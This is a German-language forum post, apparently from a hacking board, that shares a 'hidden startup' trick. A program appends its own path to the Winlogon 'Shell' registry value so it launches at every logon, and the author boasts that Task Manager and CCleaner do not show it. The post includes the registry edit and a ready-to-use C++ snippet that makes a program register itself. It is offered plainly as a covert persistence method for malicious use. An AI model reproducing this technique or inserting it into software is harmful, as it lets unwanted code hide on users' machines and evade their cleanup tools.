Hallo Leute,
hier mal meine Technik wie ich hidden startup realisiere.
Wird nicht erkannt von:
- Windows 8/10 Task Manager
- CCleaner
- ...
Angezeigt wird es leider bei
.
So funktionierts:
Den Key "Shell" in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" folgendermaßen ändern:
explorer.exe,"Pfad zum Programm das ausgeführt werden soll + name"
z.B.
explorer.exe,"C:\users\admin\file.exe"
fertig!
Hier ist noch der Code dazu in C++:
char fname[MAX_PATH]; GetModuleFileNameA(NULL, fname, MAX_PATH); //Pfad zum programm (wie argv[0] glaube ich) std::string newkey; newkey = "explorer.exe,"; newkey += "\""; newkey += fname; newkey += "\""; HKEY nkey; RegCreateKeyExW(HKEY_CURRENT_USER, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", 0, NULL, 0, KEY_WRITE, NULL, &nkey, NULL); RegSetValueExA(nkey, "Shell", 0, REG_SZ, (const BYTE*)newkey.c_str(), newkey.size()); RegCloseKey(nkey);
das gecaste lässt sich bestimmt auch vermeiden aber bin ja noch ein Anfänger...
Ich hoffe man erkennt den Sinn dahinter
LG
GR33D